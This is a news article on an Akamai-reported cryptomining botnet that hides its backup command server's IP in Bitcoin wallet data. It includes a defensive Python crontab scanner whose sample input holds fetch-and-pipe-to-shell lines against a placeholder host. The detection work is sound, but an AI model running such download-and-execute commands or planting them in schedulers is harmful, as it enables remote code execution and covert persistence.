Akamai's security team has found a new campaign in which botnet developers abuse Bitcoin blockchain transactions to hide their C2's IP addresses. The botnet is aimed at mining cryptocurrencies for its makers and uses a Bitcoin wallet address, a blockchain API, and bash one-liners to infect systems and to bring orphaned, already-infected systems back into the network.
A Blockchain Abusing Botnet
Botnets are often used for purposes such as launching DDoS attacks or mining cryptocurrencies, and they need to connect to the attacker's C2 to receive the commands that drive those actions. These connections are crucial, as they are the main point of attack for security professionals and law enforcement seeking to take down botnet networks.
Tracking them is possible through the IP addresses they use, which eventually reveal the server's location and sometimes the transmitted data and commands. Thus, white hats routinely work on finding the IP addresses of the attacker's C2. This can be a difficult job, however, if the attacker has set up backup C2 servers.
This is exactly what one botnet group tracked by Akamai researchers is doing. They detailed that the campaign starts by exploiting RCE vulnerabilities in Elasticsearch or Hadoop YARN. The attackers then deploy scripts that install Redis server scanners to find additional Redis targets.
The Mechanism For Persistence
This lets them install the Skidmap mining malware to mine cryptocurrencies, kill existing miners, modify SSH keys, and even disable security features. Cron jobs and rootkits are used to maintain persistence. But to regain lost hosts in the network, the authors need their bots to connect to a domain or a static IP address.
That is exactly what security forces target most easily to take down a botnet. So the authors of this campaign were found to have set up a backup C2 and to update their hosts to connect to the new (backup) C2. Researchers discovered a BTC wallet address, a URL for a wallet-checking API, and four bash one-liners.
All of these help them switch to a new C2 server for persistence. As the researchers wrote, wallet data is fetched through the API and used to calculate an IP address, which is the new (backup) C2's address. This method lets them store (and also obfuscate) the configuration data on the blockchain.
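As an added defender-side example (not Akamai's code and not taken from the report), the following Python heuristic scans crontab text for persistence entries that download from a URL carrying a checksum-valid Bitcoin address, the kind of wallet-checking one-liner described above; the crontab lines and the API host are constructed placeholders.

```python
import hashlib
import re

# Base58 alphabet used by Bitcoin addresses (no 0, O, I, l).
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Candidate legacy (P2PKH/P2SH) address, a download tool, and a pipe into a shell.
ADDR_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_RE = re.compile(r"\|\s*(ba)?sh\b")

# Constructed sample crontab (not from the Akamai report): the API host is a placeholder
# and the flagged address is the well-known genesis-block coinbase address.
SAMPLE_CRON = """\
0 * * * * /usr/bin/apt-get update -q
*/10 * * * * curl -s http://wallet-api.example.invalid/addr/1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa | bash
30 2 * * * /opt/backup/run.sh
*/5 * * * * wget -qO- http://wallet-api.example.invalid/addr/1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNb | sh
"""

def b58check_valid(addr: str) -> bool:
    """True if addr is 25 Base58Check bytes ending in SHA256(SHA256(payload))[:4]."""
    n = 0
    for ch in addr:
        idx = ALPHABET.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    try:
        raw = n.to_bytes(25, "big")  # version(1) + hash160(20) + checksum(4)
    except OverflowError:
        return False
    # Each leading '1' encodes one leading zero byte; the counts must agree.
    if len(addr) - len(addr.lstrip("1")) != len(raw) - len(raw.lstrip(b"\x00")):
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum

def scan_cron(text: str) -> list:
    """Flag cron entries that fetch a URL carrying a checksum-valid Bitcoin address;
    base58-looking strings with a bad checksum are ignored to cut false positives."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not FETCH_RE.search(line):
            continue
        for m in ADDR_RE.finditer(line):
            if b58check_valid(m.group(0)):
                findings.append({"line": lineno, "address": m.group(0),
                                 "pipes_to_shell": bool(PIPE_RE.search(line))})
    return findings
```

The same scan can be pointed at shell history or process command lines; a hit that also pipes into a shell is the strongest signal of the bootstrap one-liner pattern.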
As Akamai explained, “By pushing a small amount of BTC into the wallet, they can recover infected systems that have been orphaned.” “They essentially have devised a method of distributing configuration information in a medium that is effectively unseizable and uncensorable.”
The technique is great but still has room to develop, the researchers say. Though they did not explain where the authors could improve, they concluded that the makers have made more than $30,000 worth of Monero to date using this system.